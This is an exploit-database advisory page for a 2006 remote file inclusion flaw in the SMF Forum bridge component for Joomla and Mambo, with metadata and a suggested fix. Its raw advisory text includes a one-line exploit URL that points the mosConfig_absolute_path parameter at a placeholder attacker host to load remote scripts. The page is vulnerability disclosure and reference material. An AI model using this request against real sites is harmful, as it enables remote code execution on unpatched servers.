header-logo
Suggest Exploit
vendor:
SMF Forum 1.3.1.3 Bridge Component For Joomla And Mambo
by:
ASIANEAGLE
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: SMF Forum 1.3.1.3 Bridge Component For Joomla And Mambo
Affected Version From: SMF Forum 1.3.1.3
Affected Version To: SMF Forum 1.3.1.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Joomla-SMF Forum Bridge For Mambo 4.5.3+ And Mambo 4.5.3+ Remote File Inclusion Vulnebrality

A remote file inclusion vulnerability exists in SMF Forum 1.3.1.3 Bridge Component For Joomla And Mambo. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file path to the vulnerable application. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Declare variabel $mosConfig_absolute_path or add into the top function: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
Source

Exploit-DB raw data:

**********************************************************
Joomla-SMF Forum Bridge For Mambo 4.5.3+ And Mambo 4.5.3+ 
        Remote File Inclusion Vulnebrality
**********************************************************
Discovered by : ASIANEAGLE 
Remote:Yes
Level:High
---------------------------------------------------------
Application: SMF Forum 1.3.1.3 Bridge Component For Joomla And Mambo
Vulnerable File: smf.php

----------------------------------------------------------------
Exploit: http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts]
----------------------------------------------------------------------------------------------------------------------

Fixing:

1.Declare variabel $mosConfig_absolute_path or;


2.Add into the top function:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

-----------------------------------------------------------------------------------------------------------------------
Contact:
mail: asianeagle@linuxmail.org
website:http://asianeagle.to.md/

Greetz to: Muhacir, Turkmenux and All Turkish AND Turkmen Hackers

*****ASIANEAGLE SECURITY*****

# milw0rm.com [2006-07-17]